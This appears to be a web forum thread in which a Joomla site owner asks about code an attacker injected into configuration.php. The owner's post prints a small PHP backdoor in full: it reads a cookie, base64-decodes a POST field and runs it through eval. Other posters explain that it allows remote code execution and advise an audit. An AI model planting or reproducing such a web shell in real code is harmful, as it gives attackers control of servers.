1,105,197 Community Members

hacked joomla

Member Avatar
left19
Newbie Poster
6 posts since Jan 2011
Reputation Points: 0 [?]
Q&As Helped to Solve: 0 [?]
Skill Endorsements: 0 [?]
 
0
 

My site was hacked. They inserted this into livesite on configuartion.php

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) { $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) eval($d);}
echo '<name=c></textarea>';exit;}

what does it say???

Thanks

Member Avatar
Stefano Mtangoo
Senior Poster
3,713 posts since Jun 2007
Reputation Points: 441 [?]
Q&As Helped to Solve: 394 [?]
Skill Endorsements: 2 [?]
 
0
 

are you PHP developer? You can search each function and get explanations from php manual!

Member Avatar
left19
Newbie Poster
6 posts since Jan 2011
Reputation Points: 0 [?]
Q&As Helped to Solve: 0 [?]
Skill Endorsements: 0 [?]
 
0
 

are you PHP developer? You can search each function and get explanations from php manual!

no I'm not, that's why I asked you guys.

Member Avatar
Stefano Mtangoo
Senior Poster
3,713 posts since Jun 2007
Reputation Points: 441 [?]
Q&As Helped to Solve: 394 [?]
Skill Endorsements: 2 [?]
 
0
 

So you need to put more explanations.

Member Avatar
mslade
Newbie Poster
5 posts since Nov 2010
Reputation Points: 0 [?]
Q&As Helped to Solve: 0 [?]
Skill Endorsements: 0 [?]
 
1
 

My site was hacked. They inserted this into livesite on configuartion.php

if (!empty($_COOKIE) and $_COOKIE=='d'){if (!empty($_POST)) { $d=base64_decode(str_replace(' ','+',$_POST));if($d) eval($d);}
echo '<name=c></textarea>';exit;}

what does it say???

Thanks

This lets someone include encoded PHP code in the request, which will be executed on the server. This allows them to execute arbitrary PHP code with the permissions of your web server.

Member Avatar
left19
Newbie Poster
6 posts since Jan 2011
Reputation Points: 0 [?]
Q&As Helped to Solve: 0 [?]
Skill Endorsements: 0 [?]
 
0
 

Thanks for the answer. And so, how exactly did they get to that configuration.php file?

Member Avatar
Ezzaral
Posting Sage
7,431 posts since May 2007
Reputation Points: 2,714 [?]
Q&As Helped to Solve: 953 [?]
Skill Endorsements: 31 [?]
Moderator
Featured
 
0
 

Sounds like that is exactly what you should be asking your hosting provider.

Member Avatar
mslade
Newbie Poster
5 posts since Nov 2010
Reputation Points: 0 [?]
Q&As Helped to Solve: 0 [?]
Skill Endorsements: 0 [?]
 
0
 

Thanks for the answer. And so, how exactly did they get to that configuration.php file?

There's plenty of ways attackers can compromise your stuff. Your web app was vulnerable, your network was vulnerable, you're running outdated software, etc. If you're on shared hosting, I agree with the other poster -- talk to your host first.

The important thing is that if you don't identify how they get in and close it up, it'll just happen again. Until you can do a full code audit for other potential changes they made, you can't really trust your website and should still consider it compromised.

You
This article has been dead for over three months: Start a new discussion instead
Post:
Start New Discussion
Tags Related to this Article